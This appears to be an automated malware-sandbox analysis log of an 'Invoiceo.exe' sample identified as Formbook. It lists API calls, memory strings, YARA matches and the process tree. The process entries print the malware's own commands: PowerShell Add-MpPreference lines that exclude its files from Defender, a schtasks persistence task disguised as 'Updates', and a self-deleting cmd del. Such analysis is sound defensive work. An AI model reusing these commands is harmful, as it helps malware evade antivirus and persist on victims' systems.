Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03421CE4 NtQueryInformationProcess,	26_2_03421CE4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03417CF9 NtQueryVirtualMemory,	26_2_03417CF9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03413884 NtQueryValueKey,NtQueryValueKey,	26_2_03413884
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A80FC NtMapViewOfSection,NtUnmapViewOfSection,	26_2_033A80FC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D98F0 NtReadVirtualMemory,	26_2_033D98F0

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 26_2_00346550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,

26_2_00346550

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 26_2_0034374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,

26_2_0034374E

Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 0_2_025F94A8	0_2_025F94A8
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 0_2_025FC148	0_2_025FC148
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 0_2_025FA758	0_2_025FA758
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 0_2_025FF838	0_2_025FF838
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C481C8	10_2_00C481C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C43148	10_2_00C43148
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C4EDA0	10_2_00C4EDA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C41DA8	10_2_00C41DA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C489A0	10_2_00C489A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C481C8	10_2_00C481C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C49BA0	10_2_00C49BA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C4BD20	10_2_00C4BD20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C93840	10_2_00C93840
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C9CA60	10_2_00C9CA60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C98DD8	10_2_00C98DD8
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00401030	11_2_00401030
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00401208	11_2_00401208
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041DAF0	11_2_0041DAF0
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041D3F7	11_2_0041D3F7
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041DCDE	11_2_0041DCDE
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00402D90	11_2_00402D90
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00409E30	11_2_00409E30
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041CF96	11_2_0041CF96
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00402FB0	11_2_00402FB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0033D803	26_2_0033D803
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0033E040	26_2_0033E040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00339CF0	26_2_00339CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003348E6	26_2_003348E6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00355CEA	26_2_00355CEA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00353506	26_2_00353506
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00341969	26_2_00341969
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00346550	26_2_00346550
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00337190	26_2_00337190
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003531DC	26_2_003531DC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0033FA30	26_2_0033FA30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00335226	26_2_00335226
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00335E70	26_2_00335E70
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00338AD7	26_2_00338AD7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0033CB48	26_2_0033CB48
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00356FF0	26_2_00356FF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00345FC8	26_2_00345FC8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CEBB0	26_2_033CEBB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B6E30	26_2_033B6E30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03461D55	26_2_03461D55
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03390D20	26_2_03390D20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B4120	26_2_033B4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339F900	26_2_0339F900
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A841F	26_2_033A841F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451002	26_2_03451002
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033AB090	26_2_033AB090

Source: Invoiceo.exe, 00000000.00000002.229009371.000000000B700000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs Invoiceo.exe
Source: Invoiceo.exe, 00000000.00000002.230389310.000000000B7F0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs Invoiceo.exe
Source: Invoiceo.exe, 00000000.00000002.230389310.000000000B7F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Invoiceo.exe
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs Invoiceo.exe
Source: Invoiceo.exe, 00000000.00000000.199355092.00000000003CE000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSynchronizedList.exe6 vs Invoiceo.exe
Source: Invoiceo.exe, 00000000.00000003.204309078.00000000038B3000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs Invoiceo.exe
Source: Invoiceo.exe, 0000000B.00000003.322550365.0000000000E90000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs Invoiceo.exe
Source: Invoiceo.exe, 0000000B.00000002.334267380.000000000123F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Invoiceo.exe
Source: Invoiceo.exe, 0000000B.00000000.214276014.000000000069E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSynchronizedList.exe6 vs Invoiceo.exe
Source: Invoiceo.exe	Binary or memory string: OriginalFilenameSynchronizedList.exe6 vs Invoiceo.exe

Source: Invoiceo.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.476129383.0000000003200000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.Invoiceo.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.Invoiceo.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.Invoiceo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.Invoiceo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Invoiceo.exe.37e7df0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Invoiceo.exe.37e7df0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: Invoiceo.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: yYxmxiApi.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@19/19@3/1

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 26_2_0033C5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,

26_2_0033C5CA

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 26_2_0035A0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,

26_2_0035A0D2

Source: C:\Users\user\Desktop\Invoiceo.exe

File created: C:\Users\user\AppData\Roaming\yYxmxiApi.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2152:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_01
Source: C:\Users\user\Desktop\Invoiceo.exe	Mutant created: \Sessions\1\BaseNamedObjects\HHooNBuZKemHGrt

Source: C:\Users\user\Desktop\Invoiceo.exe

File created: C:\Users\user\AppData\Local\Temp\tmpEE1D.tmp

Jump to behavior

Source: Invoiceo.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Invoiceo.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\Invoiceo.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Invoiceo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: Invoiceo.exe

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\Invoiceo.exe

File read: C:\Users\user\Desktop\Invoiceo.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Invoiceo.exe 'C:\Users\user\Desktop\Invoiceo.exe'
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Invoiceo.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yYxmxiApi' /XML 'C:\Users\user\AppData\Local\Temp\tmpEE1D.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Users\user\Desktop\Invoiceo.exe C:\Users\user\Desktop\Invoiceo.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Invoiceo.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Invoiceo.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yYxmxiApi' /XML 'C:\Users\user\AppData\Local\Temp\tmpEE1D.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Users\user\Desktop\Invoiceo.exe C:\Users\user\Desktop\Invoiceo.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Invoiceo.exe'

Source: C:\Users\user\Desktop\Invoiceo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Invoiceo.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Invoiceo.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Invoiceo.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cmd.pdbUGP source: Invoiceo.exe, 0000000B.00000003.322550365.0000000000E90000.00000004.00000001.sdmp, cmd.exe, 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Invoiceo.exe, 0000000B.00000002.334267380.000000000123F000.00000040.00000001.sdmp, cmd.exe, 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Invoiceo.exe, 0000000B.00000002.334267380.000000000123F000.00000040.00000001.sdmp, cmd.exe
Source:	Binary string: cmd.pdb source: Invoiceo.exe, 0000000B.00000003.322550365.0000000000E90000.00000004.00000001.sdmp, cmd.exe

Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 0_2_00319485 push cs; ret	0_2_00319492
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 0_2_003194E5 push cs; iretd	0_2_003194E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C4A9E7 pushad ; retn 0000h	10_2_00C4A9F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C45287 push esp; retn 0000h	10_2_00C45292
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C452A7 push esi; retn 0000h	10_2_00C452C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C4521F push ecx; retn 0000h	10_2_00C45232
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C45237 push ecx; retn 0000h	10_2_00C45242
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C43B90 push cs; ret	10_2_00C43C62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C43C65 push cs; ret	10_2_00C43C66
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C93170 push esp; ret	10_2_00C93183
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C9A900 push eax; ret	10_2_00C9A913
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C90B0B push ebx; ret	10_2_00C90B1A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C9D30A pushad ; ret	10_2_00C9D313
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00C90B2D push ebx; ret	10_2_00C90B4A
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00401174 push ebx; retf	11_2_0040117A
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041DAF0 push esi; ret	11_2_0041D3F6
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041DAF0 push dword ptr [0E4C8D76h]; ret	11_2_0041DCD6
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041D3F7 push esi; ret	11_2_0041D3F6
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00417BAC push ebx; retf	11_2_00417C45
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00417C25 push ebx; retf	11_2_00417C45
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041DCDE push esi; ret	11_2_0041D3F6
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041CEF2 push eax; ret	11_2_0041CEF8
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041CEFB push eax; ret	11_2_0041CF62
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041CEA5 push eax; ret	11_2_0041CEF8
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041CF5C push eax; ret	11_2_0041CF62
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041E77F push eax; ret	11_2_0041E8E3
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_0041CF96 push esi; ret	11_2_0041D3F6
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_005E94E5 push cs; iretd	11_2_005E94E6
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_005E9485 push cs; ret	11_2_005E9492
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003476BD push ecx; ret	26_2_003476D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003476D1 push ecx; ret	26_2_003476E4

Source: initial sample	Static PE information: section name: .text entropy: 7.93397311121
Source: initial sample	Static PE information: section name: .text entropy: 7.93397311121

Source: C:\Users\user\Desktop\Invoiceo.exe

File created: C:\Users\user\AppData\Roaming\yYxmxiApi.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\Invoiceo.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yYxmxiApi' /XML 'C:\Users\user\AppData\Local\Temp\tmpEE1D.tmp'

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEF

Source: C:\Users\user\Desktop\Invoiceo.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
